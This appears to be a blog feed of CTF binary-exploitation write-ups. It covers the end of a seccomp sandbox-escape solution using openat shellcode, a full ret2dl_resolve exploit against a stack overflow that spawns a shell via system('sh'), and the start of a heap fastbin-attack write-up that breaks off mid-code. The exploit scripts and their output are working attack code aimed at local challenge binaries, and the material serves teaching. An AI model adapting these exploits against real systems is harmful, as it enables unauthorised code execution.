0x00 0x01 0x0000003a if (A != vfork) goto 0010 0009: 0x06 0x00 0x00 0x00000000 return KILL 0010: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0012 0011: 0x06 0x00 0x00 0x00000000 return KILL 0012: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0014 0013: 0x06 0x00 0x00 0x00000000 return KILL 0014: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0016 0015: 0x06 0x00 0x00 0x00000000 return KILL 0016: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0018 0017: 0x06 0x00 0x00 0x00000000 return KILL 0018: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0020 0019: 0x06 0x00 0x00 0x00000000 return KILL 0020: 0x15 0x00 0x01 0x00000142 if (A != execveat) goto 0022 0021: 0x06 0x00 0x00 0x00000000 return KILL 0022: 0x06 0x00 0x00 0x7fff0000 return ALLOW </span></code></pre></div></div> <p>Binary’s protection:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ checksec sandbox2 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments </span></code></pre></div></div> <h4 id="exploitations-scenario">Exploitation’s scenario</h4> <ol> <li> <p>No PIE enabled so first we need to extend our shellcode by calling syscall <code class="language-plaintext highlighter-rouge">read</code>.</p> </li> <li> <p>Using <code class="language-plaintext highlighter-rouge">openat</code>, <code class="language-plaintext highlighter-rouge">read</code>, and <code class="language-plaintext highlighter-rouge">write</code> syscalls to print value from flag.txt.</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="helper">Helper</h4> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./sandbox2"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="n">e</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./sandbox2'</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="s">"b *0x400C18</span><span class="se">\n</span><span class="s">b* 0x400BA5"</span><span class="p">)</span> <span class="c1"># for debugging </span></code></pre></div></div> <h4 id="stage-1-extending-shellcode">Stage 1. Extending shellcode</h4> <p>Because our shellcode can’t be longer than 17 bytes, so we should use the space as best as possible. After debugging the binary, found that register <code class="language-plaintext highlighter-rouge">r12</code> holds address to <code class="language-plaintext highlighter-rouge">start</code> region. Subtract it a bit to point to <code class="language-plaintext highlighter-rouge">read</code> function. Then set return address value to where our next shellcode lies.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pload1</span> <span class="o">=</span> <span class="s">"sub r12, 80</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">+=</span> <span class="s">"mov [rsp+0x18], rdx</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">+=</span> <span class="s">"mov esi, edx</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">+=</span> <span class="s">"xor edi, edi</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">+=</span> <span class="s">"call r12</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">+=</span> <span class="s">"ret</span><span class="se">\n</span><span class="s">"</span> <span class="n">pload1</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">pload1</span><span class="p">,</span> <span class="n">vma</span><span class="o">=</span><span class="n">e</span><span class="p">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'shellcode'</span><span class="p">])</span> <span class="n">pload1</span> <span class="o">=</span> <span class="n">pload1</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x11</span><span class="p">,</span> <span class="s">'</span><span class="se">\x90</span><span class="s">'</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">pload1</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-2-reading-flag">Stage 2. Reading flag</h4> <p>Because <code class="language-plaintext highlighter-rouge">open</code> is restricted by seccomp, we use <code class="language-plaintext highlighter-rouge">openat</code> that has similar functionality to <code class="language-plaintext highlighter-rouge">open</code>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pload2</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span> <span class="n">shellcraft</span><span class="p">.</span><span class="n">linux</span><span class="p">.</span><span class="n">openat</span><span class="p">(</span><span class="o">-</span><span class="mi">100</span><span class="p">,</span> <span class="s">'flag.txt'</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcraft</span><span class="p">.</span><span class="n">linux</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'rax'</span><span class="p">,</span> <span class="s">'rsp'</span><span class="p">,</span> <span class="mh">0x200</span><span class="p">)</span> <span class="o">+</span> <span class="n">shellcraft</span><span class="p">.</span><span class="n">linux</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s">'rsp'</span><span class="p">,</span> <span class="mh">0x200</span><span class="p">)</span> <span class="o">+</span> <span class="s">"leave</span><span class="se">\n</span><span class="s">ret"</span> <span class="p">)</span> <span class="n">pload2</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">20</span> <span class="o">+</span> <span class="n">pload2</span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">pload2</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">())</span> </code></pre></div></div> <h4 id="result">Result</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ python solve.py [+] Starting local process './sandbox2': pid 24962 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Extending shellcode <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Reading flag <span class="go">[*] Process './sandbox2' stopped with exit code 0 (pid 24962) [+] flag{dummy_flag} \x0c@\x00\x00\x00\x00\x00�g�^\x11\x00\x00\x00\xb0 `\x00\x00\x00\x00\x00\xb0 `\x00\x00\x00\x00\x00\x97k�fs\x7f\x00\x00
\x00\x00\x00\x00\x00\x00\x00�g�^�\x7f\x00\x00\x00\x80\x00\x00
\x00\x00\x00?\x0b@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x85\x84����Ё0\x07@\x00\x00\x00\x00\x00�g�^�\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x85\x84�*\x18L(~\x85\x84\x1a2\x86&lt;6\x7f\x00\x00\x00\x00�\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003g\x0egs\x7f\x00\x008� gs\x7f\x00\x00\x0e\xb4\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x07@\x00\x00\x00\x00\x00�g�^�Z@\x00\x00\x00\x00\x00�g�^�\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\xb9\x81\x9f^�\x00\x00\x00\x00\x00\x00ā\x9f^�΁\x9f^���\x9f^�
�\x9f^�-�\x9f^�E�\x9f^�]�\x9f^�~�\x9f^���\x9f^���\x9f^���\x9f^���\x9f^�˂\x9f^�ۂ\x9f^���\x9f^���\x9f^���\x9f^��\x9f^��\x9f^�5�\x9f^�I�\x9f^�\�\x9f^���\x9f^�ӄ\x9f^���\x9f^���\x9f^� �\x9f^�!�\x9f^� </span></code></pre></div></div> Tue, 17 Dec 2019 00:00:00 +0000 https://fachrioktavian.github.io//blog/ctf/kksiquals19-sandbox2/ https://fachrioktavian.github.io//blog/ctf/kksiquals19-sandbox2/ ctf linux x64 sandbox escape ctf <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/hitbgsec19/blazeme">https://github.com/fachrioktavian/ctf-writeup/tree/master/hitbgsec19/blazeme</a></p> <h3 id="summary">Summary</h3> <p>I’ve got this challenge from friend who joined the hitbgsec ctf in Singapore last year. This challenge refreshes my memory about a technique called ret2dl_resolve. It’s a technique like ret2libc, but because the limitation of libc function in the binary so we return the binary using lazy binding mechanism of <code class="language-plaintext highlighter-rouge">_dl_resolve()</code> function.</p> <h4 id="overview">Overview</h4> <p>The binary is a simple binary, it reads input exits. Nothing fancy, no funtion to read flag or libc’s system function.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">;</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">200u</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>Binary’s protection:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ checksec blazeme Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) </span></code></pre></div></div> <h4 id="the-bugs">The bugs</h4> <p>From the Overview section above we should now that it’s a stack buffer overflow. Dynamic binary, No canary and NX protection found, so basically we will solve this challenge using ret2libc. But again there isn’t any function that useful to leak libc address.</p> <h4 id="exploitations-scenario">Exploitation’s scenario</h4> <ol> <li> <p>Because we can’t leak anything, first we should defeat ASLR by read our payload to BSS segment and jump to it. Thank god no PIE enable.</p> </li> <li> <p>Calling <code class="language-plaintext highlighter-rouge">_dl_resolve()</code> to resolves and calls <code class="language-plaintext highlighter-rouge">system("sh")</code>.</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="helper">Helper</h4> <p>Some variable that we need in the exploitation process, will talk about it in the Stage 2’s section.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./blazeme"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="n">read_plt</span> <span class="o">=</span> <span class="mh">0x080482f0</span> <span class="n">tmp_got</span> <span class="o">=</span> <span class="mh">0x0804a000</span> <span class="n">ELF_JMPREL_Rel_Tab</span> <span class="o">=</span> <span class="mh">0x08048298</span> <span class="n">ELF_String_Tab</span> <span class="o">=</span> <span class="mh">0x0804821C</span> <span class="n">ELF_Symbol_Tab</span> <span class="o">=</span> <span class="mh">0x080481CC</span> <span class="n">leave_ret_gdt</span> <span class="o">=</span> <span class="mh">0x08048388</span> <span class="n">bss_segment</span> <span class="o">=</span> <span class="mh">0x0804af00</span> <span class="n">_dl_resolve</span> <span class="o">=</span> <span class="mh">0x080482e0</span> <span class="n">pad</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">108</span> </code></pre></div></div> <h4 id="stage-1-reads-stage2-payload-and-jump-to-it-defeat-aslr">Stage 1. Reads stage2 payload and jump to it, defeat ASLR</h4> <p>Using ret2libc we craft payload to read stage2 payload and jump to it using <code class="language-plaintext highlighter-rouge">leave; ret;</code> gadget.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">stage1</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">pad</span><span class="p">,</span> <span class="n">p32</span><span class="p">(</span><span class="n">bss_segment</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="n">read_plt</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="n">leave_ret_gdt</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="n">bss_segment</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x80</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">stage1</span><span class="p">)</span> </code></pre></div></div> <p>Binary then will reads our next input and stores it on BSS segment.</p> <h4 id="stage-2-return-to-_dl_resolve">Stage 2. Return to _dl_resolve()</h4> <h5 id="elf-relocation">Elf relocation</h5> <p>We know that for a dynamic binary, when it calls a libc function (e.g <code class="language-plaintext highlighter-rouge">read</code>) for the first time, the Linker (we know as <code class="language-plaintext highlighter-rouge">LD</code>) will search it in the libc then executes the function. After that the address of <code class="language-plaintext highlighter-rouge">read</code> will placed in GOT segment and can be use for the next function call.</p> <h5 id="dynamic-section">Dynamic section</h5> <p>In the ELF binary there is a dynamic section that’s used for LD to resolve symbols at runtime.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ readelf -d blazeme Dynamic section at offset 0xf14 contains 24 entries: Tag Type Name/Value 0x00000001 (NEEDED) 0x1 0x0000000c (INIT) 0x80482b0 0x0000000d (FINI) 0x80484c4 0x00000019 (INIT_ARRAY) 0x8049f08 0x0000001b (INIT_ARRAYSZ) 4 (bytes) 0x0000001a (FINI_ARRAY) 0x8049f0c 0x0000001c (FINI_ARRAYSZ) 4 (bytes) 0x6ffffef5 (GNU_HASH) 0x80481ac 0x00000005 (STRTAB) 0x804821c 0x00000006 (SYMTAB) 0x80481cc 0x0000000a (STRSZ) 74 (bytes) 0x0000000b (SYMENT) 16 (bytes) 0x00000015 (DEBUG) 0x0 0x00000003 (PLTGOT) 0x804a000 0x00000002 (PLTRELSZ) 24 (bytes) 0x00000014 (PLTREL) REL 0x00000017 (JMPREL) 0x8048298 0x00000011 (REL) 0x8048290 0x00000012 (RELSZ) 8 (bytes) 0x00000013 (RELENT) 8 (bytes) 0x6ffffffe (VERNEED) 0x8048270 0x6fffffff (VERNEEDNUM) 1 0x6ffffff0 (VERSYM) 0x8048266 0x00000000 (NULL) 0x0 </span></code></pre></div></div> <p>For exploitation, we will focus on <code class="language-plaintext highlighter-rouge">STRTAB</code> (ELF String Table), <code class="language-plaintext highlighter-rouge">SYMTAB</code> (ELF Symbol Table), and <code class="language-plaintext highlighter-rouge">JMPREL</code> (ELF Relocation Table).</p> <h5 id="jmprel">JMPREL</h5> <p>JMPREL segment (‘PLT’ Relocation section) stores a table called <code class="language-plaintext highlighter-rouge">relocation table</code>. Each entry maps to a symbol and the size of each entry is 8 bytes.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ readelf --use-dynamic -r blazeme 'REL' relocation section at offset 0x8048290 contains 8 bytes: Offset Info Type Sym.Value Sym. Name </span><span class="gp">08049ffc 00000206 R_386_GLOB_DAT 00000000 &lt;string table index: 49&gt;</span><span class="w"> </span><span class="go"> 'PLT' relocation section at offset 0x8048298 contains 24 bytes: Offset Info Type Sym.Value Sym. Name </span><span class="gp">0804a00c 00000107 R_386_JUMP_SLOT 00000000 &lt;string table index: 26&gt;</span><span class="w"> </span><span class="gp">0804a010 00000207 R_386_JUMP_SLOT 00000000 &lt;string table index: 49&gt;</span><span class="w"> </span><span class="gp">0804a014 00000307 R_386_JUMP_SLOT 00000000 &lt;string table index: 31&gt;</span><span class="w"> </span></code></pre></div></div> <pre><code class="language-asm"># disasm of blazeme LOAD:08048298 ; ELF JMPREL Relocation Table LOAD:08048298 Elf32_Rel &lt;804A00Ch, 107h&gt; ; R_386_JMP_SLOT read LOAD:080482A0 Elf32_Rel &lt;804A010h, 207h&gt; ; R_386_JMP_SLOT __gmon_start__ LOAD:080482A8 Elf32_Rel &lt;804A014h, 307h&gt; ; R_386_JMP_SLOT __libc_start_main </code></pre> <p>The entries’ struct type is <code class="language-plaintext highlighter-rouge">Elf32_Rel</code> which define in macros:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="kt">uint32_t</span> <span class="n">Elf32_Addr</span> <span class="p">;</span> <span class="k">typedef</span> <span class="kt">uint32_t</span> <span class="n">Elf32_Word</span> <span class="p">;</span> <span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Elf32_Addr</span> <span class="n">r_offset</span> <span class="p">;</span> <span class="cm">/* Address */</span> <span class="n">Elf32_Word</span> <span class="n">r_info</span> <span class="p">;</span> <span class="cm">/* Relocation type and symbol index */</span> <span class="p">}</span> <span class="n">Elf32_Rel</span> <span class="p">;</span> <span class="cp">#define ELF32_R_SYM(val) ((val) &gt;&gt; 8) #define ELF32_R_TYPE(val) ((val) &amp; 0xff) </span></code></pre></div></div> <p>If we take a look on first entry of PLT relocation section there is symbol <code class="language-plaintext highlighter-rouge">read</code>:</p> <ul> <li> <p><code class="language-plaintext highlighter-rouge">Offset</code> or <code class="language-plaintext highlighter-rouge">r_offset</code> saves GOT address of <code class="language-plaintext highlighter-rouge">read</code> 0x0804a00c</p> </li> <li> <p><code class="language-plaintext highlighter-rouge">Info</code> or <code class="language-plaintext highlighter-rouge">r_info</code> stores the metadata of <code class="language-plaintext highlighter-rouge">ELF32_R_SYM</code> and <code class="language-plaintext highlighter-rouge">ELF32_R_TYPE</code>. <code class="language-plaintext highlighter-rouge">r_info</code> 0x107,from defined macros we know that <code class="language-plaintext highlighter-rouge">ELF32_R_SYM</code> is 1 ((val) » 8) and <code class="language-plaintext highlighter-rouge">ELF32_R_TYPE</code> is 7 ((val) &amp; 0xff)</p> </li> </ul> <h5 id="symtab">SYMTAB</h5> <p>SYMTAB segments(ELF Symbol Table) stores relevant symbols information. The type of each entry is <code class="language-plaintext highlighter-rouge">ELF32_Sym</code> struct and the size is 16 bytes. The type is define as:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span> <span class="n">Elf32_Word</span> <span class="n">st_name</span> <span class="p">;</span> <span class="cm">/* Symbol name (string tbl index) */</span> <span class="n">Elf32_Addr</span> <span class="n">st_value</span> <span class="p">;</span> <span class="cm">/* Symbol value */</span> <span class="n">Elf32_Word</span> <span class="n">st_size</span> <span class="p">;</span> <span class="cm">/* Symbol size */</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">st_info</span> <span class="p">;</span> <span class="cm">/* Symbol type and binding */</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">st_other</span> <span class="p">;</span> <span class="cm">/* Symbol visibility under glibc&gt;=2.2 */</span> <span class="n">Elf32_Section</span> <span class="n">st_shndx</span> <span class="p">;</span> <span class="cm">/* Section index */</span> <span class="p">}</span> <span class="n">Elf32_Sym</span> <span class="p">;</span> </code></pre></div></div> <pre><code class="language-gdb">pwndbg&gt; x/4wx 0x080481DC 0x80481dc: 0x0000001a 0x00000000 0x00000000 0x00000012 </code></pre> <p>The first value <code class="language-plaintext highlighter-rouge">st_name</code> holds the offset of name of the symbols starts in <code class="language-plaintext highlighter-rouge">STRTAB</code>.</p> <h5 id="strtab">STRTAB</h5> <p>STRTAB segments(ELF String Table) is a table that stores strings of symbols name.</p> <pre><code class="language-asm">LOAD:0804821C ; ELF String Table LOAD:0804821C byte_804821C db 0 LOAD:0804821C LOAD:0804821D aLibcSo6 db 'libc.so.6',0 LOAD:08048227 aIoStdinUsed db '_IO_stdin_used',0 LOAD:08048236 aRead db 'read',0 LOAD:0804823B aLibcStartMain db '__libc_start_main',0 LOAD:0804823B LOAD:0804824D aGmonStart db '__gmon_start__',0 LOAD:0804825C aGlibc20 db 'GLIBC_2.0',0 </code></pre> <p>If we look at JMPREL section, ELF32_R_SYM of <code class="language-plaintext highlighter-rouge">read</code> is 1 and st_name is 0x1a. This information is used to get value in STRTAB.</p> <pre><code class="language-gdb">pwndbg&gt; x/s 0x0804821C + (1*0x1a) 0x8048236: "read" </code></pre> <h5 id="_dl_runtime_resolve">_dl_runtime_resolve()</h5> <p>When resolver runs, it calls _dl_runtime_resolve(link_map, rel_offset). The rel_offset gives offset of the <code class="language-plaintext highlighter-rouge">Elf32_Rel</code> struct in JMPREL table. <code class="language-plaintext highlighter-rouge">link_map</code> gives address of list with all loaded libraries. _dl_runtime_resolve() will use that address to stores resolved read function from libc. So basically it’s just need a writable address. The pseudocode that describes what _dl_runtime_resolve() does is:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// call of unresolved read(0, buf, 0x100)</span> <span class="n">_dl_runtime_resolve</span><span class="p">(</span><span class="n">link_map</span><span class="p">,</span> <span class="n">rel_offset</span><span class="p">)</span> <span class="p">{</span> <span class="n">Elf32_Rel</span> <span class="o">*</span> <span class="n">rel_entry</span> <span class="o">=</span> <span class="n">JMPREL</span> <span class="o">+</span> <span class="n">rel_offset</span> <span class="p">;</span> <span class="n">Elf32_Sym</span> <span class="o">*</span> <span class="n">sym_entry</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">SYMTAB</span> <span class="p">[</span> <span class="n">ELF32_R_SYM</span> <span class="p">(</span> <span class="n">rel_entry</span> <span class="o">-&gt;</span> <span class="n">r_info</span> <span class="p">)];</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">sym_name</span> <span class="o">=</span> <span class="n">STRTAB</span> <span class="o">+</span> <span class="n">sym_entry</span> <span class="o">-&gt;</span> <span class="n">st_name</span> <span class="p">;</span> <span class="n">_search_for_symbol_</span><span class="p">(</span><span class="n">link_map</span><span class="p">,</span> <span class="n">sym_name</span><span class="p">);</span> <span class="c1">// invoke initial read call now that symbol is resolved</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <h5 id="building-payload">Building payload</h5> <p>With knowing concept of JMPREL, SYMTAB, STRTAB, and how _dl_runtime_resolve() works, then we can craft a payload that ask binary to call _dl_runtime_resolve to resolves symbol system then calls <code class="language-plaintext highlighter-rouge">system('sh')</code> for us.</p> <p>First calculate the address off <code class="language-plaintext highlighter-rouge">Elf32_Rel</code> structure of system’s symbols that we create in stage2 as <code class="language-plaintext highlighter-rouge">0x08048298</code> is address of the top table of JMPREL.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">crafted_area</span> <span class="o">=</span> <span class="n">bss_segment</span> <span class="o">+</span> <span class="mh">0x14</span> <span class="n">elf32_Rel_offset</span> <span class="o">=</span> <span class="n">crafted_area</span> <span class="o">-</span> <span class="n">ELF_JMPREL_Rel_Tab</span> </code></pre></div></div> <p>Then calculate <code class="language-plaintext highlighter-rouge">elf32_Sym_offset</code> and <code class="language-plaintext highlighter-rouge">elf32_Sym_index</code> as <code class="language-plaintext highlighter-rouge">0x080481CC</code> is the address of top address of SYMTAB.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">elf32_Sym_offset</span> <span class="o">=</span> <span class="n">crafted_area</span> <span class="o">+</span> <span class="mh">0x8</span> <span class="n">align</span> <span class="o">=</span> <span class="mh">0x10</span> <span class="o">-</span> <span class="p">((</span><span class="n">elf32_Sym_offset</span> <span class="o">-</span> <span class="n">ELF_Symbol_Tab</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">elf32_Sym_offset</span> <span class="o">+=</span> <span class="n">align</span> <span class="n">elf32_Sym_index</span> <span class="o">=</span> <span class="p">(</span><span class="n">elf32_Sym_offset</span> <span class="o">-</span> <span class="n">ELF_Symbol_Tab</span><span class="p">)</span> <span class="o">/</span> <span class="mh">0x10</span> </code></pre></div></div> <p>Next, calculate <code class="language-plaintext highlighter-rouge">elf32_Sym_st_name</code> value so _dl_runtime_resolve can find our “system” string.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">elf32_Rel_r_info</span> <span class="o">=</span> <span class="p">(</span><span class="n">elf32_Sym_index</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">|</span> <span class="mh">0x7</span> <span class="n">elf32_Rel_data</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">tmp_got</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="n">elf32_Rel_r_info</span><span class="p">))</span> <span class="n">elf32_Sym_st_name</span> <span class="o">=</span> <span class="p">(</span><span class="n">elf32_Sym_offset</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">-</span> <span class="n">ELF_String_Tab</span> <span class="n">elf32_Sym_data</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span><span class="n">p32</span><span class="p">(</span><span class="n">elf32_Sym_st_name</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x12</span><span class="p">))</span> </code></pre></div></div> <p>Finally craft all stage 2 payload:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">system_param_offset</span> <span class="o">=</span> <span class="n">bss_segment</span> <span class="o">+</span> <span class="mh">0x64</span> <span class="n">system_str</span> <span class="o">=</span> <span class="s">"system</span><span class="se">\x00</span><span class="s">"</span> <span class="n">system_param_str</span> <span class="o">=</span> <span class="s">"sh</span><span class="se">\x00</span><span class="s">"</span> <span class="n">stage2</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span> <span class="s">"JUNK"</span><span class="p">,</span> <span class="n">p32</span><span class="p">(</span><span class="n">_dl_resolve</span><span class="p">),</span> <span class="n">p32</span><span class="p">(</span><span class="n">elf32_Rel_offset</span><span class="p">),</span> <span class="s">"JUNK"</span><span class="p">,</span> <span class="n">p32</span><span class="p">(</span><span class="n">system_param_offset</span><span class="p">),</span> <span class="n">elf32_Rel_data</span><span class="p">,</span> <span class="s">"A"</span><span class="o">*</span><span class="n">align</span><span class="p">,</span> <span class="n">elf32_Sym_data</span><span class="p">,</span> <span class="n">system_str</span><span class="p">)</span> <span class="n">pad</span> <span class="o">=</span> <span class="s">"B"</span> <span class="o">*</span> <span class="p">(</span><span class="mi">100</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">stage2</span><span class="p">))</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span> <span class="n">pad</span><span class="p">,</span> <span class="n">system_param_str</span><span class="p">)</span> <span class="n">pad</span> <span class="o">=</span> <span class="s">"C"</span> <span class="o">*</span> <span class="p">(</span><span class="mh">0x80</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">stage2</span><span class="p">))</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">flat</span><span class="p">(</span><span class="n">pad</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">stage2</span><span class="p">)</span> </code></pre></div></div> <h4 id="pwned">Pwned</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ python solve2.py [+] Starting local process './blazeme': pid 6768 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Read stage2 payload and jump to stage2 <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Ret2dl_resolve <span class="go">[+] Pwned! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">uname</span> <span class="nt">-a</span> <span class="gp">Linux fokt 5.0.0-31-generic #</span>33~18.04.1-Ubuntu SMP Tue Oct 1 10:20:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux </code></pre></div></div> Wed, 04 Dec 2019 00:00:00 +0000 https://fachrioktavian.github.io//blog/ctf/hitbgsec19-blazeme/ https://fachrioktavian.github.io//blog/ctf/hitbgsec19-blazeme/ ctf linux x86 stack buffer overflow ret2dl_resolve binary exploitation ctf <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/asisfin19/securalloc">https://github.com/fachrioktavian/ctf-writeup/tree/master/asisfin19/securalloc</a></p> <h3 id="summary">Summary</h3> <p>This is a nice challenge, refresh us about some technique before tcache was inroduce in the recent libc version. There are many approach to solve this challenge, we can use house of force or house of orange. For this post i will use fastbin attack like what Quentinmeffre did in his <a href="https://quentinmeffre.fr/exploit/heap/2018/11/02/fastbin_attack.html">post</a></p> <h4 id="overview">Overview</h4> <p>The binary is a general challenge of heap exploitation, there are malloc and free function. But binary implements function <code class="language-plaintext highlighter-rouge">secure_malloc</code>, <code class="language-plaintext highlighter-rouge">secure_init</code>, <code class="language-plaintext highlighter-rouge">secure_free</code>.</p> <p><code class="language-plaintext highlighter-rouge">secure_init</code> is a function to get a canary value from <code class="language-plaintext highlighter-rouge">/dev/urandom</code>, this canary then is saved in every heap chunk that is created by <code class="language-plaintext highlighter-rouge">secure_malloc</code>. This canary prevents us to do heap buffer overflow because there will always be a heap canary checking after doing some input to the buffer.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="o">*</span><span class="nf">secure_init</span><span class="p">()</span> <span class="c1">// 